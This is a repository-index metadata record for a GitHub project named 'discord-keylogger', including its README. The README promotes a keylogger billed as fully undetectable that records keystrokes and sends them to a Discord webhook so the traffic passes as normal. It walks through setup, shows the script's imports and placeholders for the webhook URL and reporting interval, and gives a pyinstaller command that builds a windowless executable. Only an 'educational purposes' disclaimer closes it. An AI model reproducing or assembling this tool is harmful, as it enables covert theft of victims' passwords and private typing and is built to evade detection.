{"id":42662343,"url":"https://github.com/evildevill/discord-keylogger","last_synced_at":"2026-01-29T09:52:46.374Z","repository":{"id":109464123,"uuid":"439823545","full_name":"evildevill/discord-keylogger","owner":"evildevill","description":"This python script will capture all of the keystrokes within a given time frame and report them to a Discord Server using Webhooks. Instead of the traditional \"save to file\" or \"report to email\" methods, you can use this method to stay undetected since webhook requests are considered as normal Discord Traffic. Written in python. Made by Hacker wasii","archived":false,"fork":false,"pushed_at":"2025-06-20T22:31:14.000Z","size":18,"stargazers_count":29,"open_issues_count":10,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-06-20T23:28:22.140Z","etag":null,"topics":["discord-bot","discord-hacks","discrod","discrod-bot","enumeration","hacker-wasii","hackerwasii","instahack","python","waseem-akram"],"latest_commit_sha":null,"homepage":"https://bit.ly/hackerwasiisg","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/evildevill.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2021-12-19T09:30:56.000Z","updated_at":"2025-06-13T20:55:52.000Z","dependencies_parsed_at":"2025-06-20T23:24:28.528Z","dependency_job_id":"48c7a249-bf6a-4442-a3d0-40a63b829cee","html_url":"https://github.com/evildevill/discord-keylogger","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/evildevill/discord-keylogger","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evildevill%2Fdiscord-keylogger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evildevill%2Fdiscord-keylogger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evildevill%2Fdiscord-keylogger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evildevill%2Fdiscord-keylogger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/evildevill","download_url":"https://codeload.github.com/evildevill/discord-keylogger/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/evildevill%2Fdiscord-keylogger/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28875160,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-29T09:47:23.353Z","status":"ssl_error","status_checked_at":"2026-01-29T09:47:19.357Z","response_time":59,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["discord-bot","discord-hacks","discrod","discrod-bot","enumeration","hacker-wasii","hackerwasii","instahack","python","waseem-akram"],"created_at":"2026-01-29T09:52:45.765Z","updated_at":"2026-01-29T09:52:46.369Z","avatar_url":"https://github.com/evildevill.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# FUD Keylogger That Reports To Discord #\n\nThis python script will capture all of the keystrokes within a given time frame and report them to a Discord Server using Webhooks. Instead of the traditional \"save to file\" or \"report to email\" methods, you can use this method to stay undetected since webhook requests are considered as normal Discord Traffic.\n\n## Getting Started\n\nMake sure you have Python installed on your machine, you download the installer from [here](https://www.python.org/downloads/).\n\n## Installation\n```\ngit clone https://github.com/evildevill/discord-keylogger.git\n```\n\n## Install Required Libraries\n```\npython -m pip install -r requirements.txt\n```\n\n## Create a Discord Server \n\nYou can follow [this](https://support.discord.com/hc/en-us/articles/204849977-How-do-I-create-a-server-) article on how to do that.\n\n## Create a Discord Webhook\n\nGot to your servers settings select Intergrations \u003e\u003e Webhooks and create a new Webhook. You can also customize it and give it a name and a featured icon. Make sure to copy the URL, you will need it later.\n\n\n## Edit keylogger.py\nIts time to edit the python script. Now that you have the Webhook URL, you can add that to the file. Also make sure to add your desired timeframe that they keylogger will report to you. You have to add the time in seconds so you can use [this](https://www.calculatorsoup.com/calculators/conversions/time.php) converter to get the correct time in seconds.\n\n```Python\nimport keyboard,os\nfrom threading import Timer\nfrom datetime import datetime\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\n\nSEND_REPORT_EVERY = TIME_IN_SECONDS_HERE\nWEBHOOK = \"WEBHOOK_URL_HERE\"\n```\n\n## Execute the script\n\nYou are now ready to test the script and see whether if it works or not. If you are having problems with the script please open a new ticket on the issues tab and i will try to help you.\n\nTo execute the script all you have to do is run:\n```\npython keylogger.py\n```\nIf all goes right, you should see a report on discord after the seconds you have specified on the script have passed.\n\n## Compile the script\n\nNow what if you want to turn this into an executable? You can do that with the pyinstaller library that was included in the requirements.txt file.\n```\npyinstaller PATH_TO_SCRIPT --onefile --noconsole\n```\n## ⚠️ DISCLAIMER ⚠️\n\n**I am not responsible for any of your actions. This GitHub repository is made for educational purposes only!!!**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevildevill%2Fdiscord-keylogger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fevildevill%2Fdiscord-keylogger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fevildevill%2Fdiscord-keylogger/lists"}